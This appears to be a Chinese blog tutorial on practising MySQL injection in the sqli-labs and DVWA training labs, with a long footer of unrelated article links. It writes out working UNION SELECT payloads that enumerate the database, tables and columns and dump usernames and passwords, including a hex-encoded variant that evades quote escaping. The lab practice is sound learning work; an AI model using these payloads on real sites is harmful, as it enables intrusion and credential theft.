首页
所有分类
TAGS
文字工具 EMOJI BIBLE
数据库 MySQL

MySQL注入基础练习

Posted in MySQL onMay 30, 2021

以sqli-labs-master作为练习

初始:简单获取基础内容

第一步,使用拼接的方式决定注入类型

MySQL注入基础练习

第二部,使用order by确定有表单有几列值

order by根据指定的列对结果集进行排序

MySQL注入基础练习

第三步,使用union select 来找到内容,获取想要得到内容

union select :联合查询

MySQL注入基础练习

进阶,通过mysql注入获取表单内容,托库;

第一步:通过数据库语句进行搜索,首先确定数据库

MySQL注入基础练习

第二部:确定数据库后,爆出它的表;

MySQL注入基础练习

第三步:确定表以后,可根据实际需求爆表,这里以users举例,进行爆字段

MySQL注入基础练习

第四部:确定字段后,我们就可以拖库;

MySQL注入基础练习

DVWA训练基础 low级别

1.参照上文确定当前库

1' union select (select database()),2 -- -

MySQL注入基础练习

2.确定库后,爆表

1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),2 -- -

MySQL注入基础练习

3.确定表后,爆字段

1' union select (select group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name='users'),2 -- -

MySQL注入基础练习

4.确定字段后,进行拖库

1' union select (select group_concat(concat_ws(0x7e,user,password))from users),2 -- -

MySQL注入基础练习

级别Medium

与low级别不同,没有输入框,只有选择项,所以需要借助bp工具

MySQL注入基础练习

1.打开代理使用bp进行抓包并发送到Repeater模块进行反复验证

MySQL注入基础练习

2.其余步骤参考上文:暴库

MySQL注入基础练习

爆表

ps:因为后台强制转译的问题,要注意避免单引号

MySQL注入基础练习

爆字段

同爆表,因为转译的问题,要注意避免引号,可使用编译规避;

1 union  select 1,(select group_concat(column_name) from information_schema.columns where table_schema = (select database()) and table_name=0x7573657273)

MySQL注入基础练习

拖库

MySQL注入基础练习

MySQL注入基础练习

- Author -

纪迁辰

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

MySQL 相关文章推荐
mysql优化
Apr 06 MySQL
一篇文章弄懂MySQL查询语句的执行过程
May 07 MySQL
MySQL sql_mode的使用详解
May 08 MySQL
mysql配置SSL证书登录的实现
Sep 04 MySQL
MySQL数据库超时设置配置的方法实例
Oct 15 MySQL
MySQL数据库完全卸载的方法
Mar 03 MySQL
MySQL实战记录之如何快速定位慢SQL
Mar 23 MySQL
解决Mysql报错 Table 'mysql.user' doesn't exist
May 06 MySQL
MySQL 逻辑备份 into outfile
May 15 MySQL
MySQL控制流函数(-if ,elseif,else,case...when)
Jul 07 MySQL
MySQL中LAG()函数和LEAD()函数的使用
Aug 14 MySQL
MySQL中的 inner join 和 left join的区别解析(小结果集驱动大结果集)
May 08 MySQL
解决Navicat for MySQL 连接 MySQL 报2005错误的问题
MYSQL(电话号码,身份证)数据脱敏的实现
May 28 #MySQL
MySql开发之自动同步表结构
mysql升级到5.7时,wordpress导数据报错1067的问题
May 27 #MySQL
解决Navicat for Mysql连接报错1251的问题(连接失败)
Navicat for MySQL的使用教程详解
MySQL Router实现MySQL的读写分离的方法
约旦购物网站(1) 马耳他购物网站(1) 乌克兰购物网站(27) 哈萨克斯坦购物网站(2) 冰岛购物网站(1) 白俄罗斯购物网站(3) 希腊购物网站(6) 罗马尼亚购物网站(10) 保加利亚购物网站(3) 亚洲购物网站(6)
You might like
PHP 常用数组内部函数(Array Functions)介绍
2013/06/05 PHP
解析WordPress中函数钩子hook的作用及基本用法
2015/12/22 PHP
PHP集成环境XAMPP的安装与配置
2018/11/13 PHP
PHP的介绍以及优势详细分析
2019/09/05 PHP
JS input 数字验证代码
2009/07/30 Javascript
JS setCapture 区域外事件捕捉
2010/03/18 Javascript
JS禁用浏览器退格键实现思路及代码
2013/10/29 Javascript
js鼠标滑过图片震动特效的方法
2015/02/17 Javascript
javascript中 try catch用法
2015/08/16 Javascript
Jquery组件easyUi实现表单验证示例
2016/08/23 Javascript
javascript 删除数组元素和清空数组的简单方法
2017/02/24 Javascript
JavaScript面向对象精要(上部)
2017/09/12 Javascript
vue项目中v-model父子组件通信的实现详解
2017/12/10 Javascript
iview在vue-cli3如何按需加载的方法
2018/10/31 Javascript
jQuery内容选择器与表单选择器实例分析
2019/06/28 jQuery
Vue商品控件与购物车联动效果的实例代码
2019/07/21 Javascript
微信小程序设置滚动条过程详解
2019/07/25 Javascript
通过扫小程序码实现网站登陆功能
2019/08/22 Javascript
解决layer 关闭当前弹窗 关闭遮罩层 input值获取不到的问题
2019/09/25 Javascript
Vue的Eslint配置文件eslintrc.js说明与规则介绍
2020/02/03 Javascript
解决React在安装antd之后出现的Can't resolve './locale'问题(推荐)
2020/05/03 Javascript
微信小程序自定义胶囊样式
2020/12/27 Javascript
[56:47]Ti4 循环赛第三日 iG vs Liquid
2014/07/12 DOTA
[01:11:11]Alliance vs RNG 2019国际邀请赛淘汰赛 败者组BO1 8.20.mp4
2020/07/19 DOTA
python 定时修改数据库的示例代码
2018/04/08 Python
python tkinter界面居中显示的方法
2018/10/11 Python
对python中数组的del,remove,pop区别详解
2018/11/07 Python
解决py2exe打包后,总是多显示一个DOS黑色窗口的问题
2019/06/21 Python
基于HTML5新特性Mutation Observer实现编辑器的撤销和回退操作
2016/01/11 HTML / CSS
世界领先的26岁以下学生和青少年旅行预订网站:StudentUniverse
2018/07/01 全球购物
英国最大的在线时尚眼镜店:Eyewearbrands
2019/03/12 全球购物
质量承诺书怎么写
2014/05/24 职场文书
小学生红领巾广播稿
2015/08/19 职场文书
2016大学先进团支部事迹材料
2016/03/01 职场文书
浅谈由position属性引申的css进阶讨论
2021/05/25 HTML / CSS
elasticSearch-api的具体操作步骤讲解
2021/06/28 Java/Android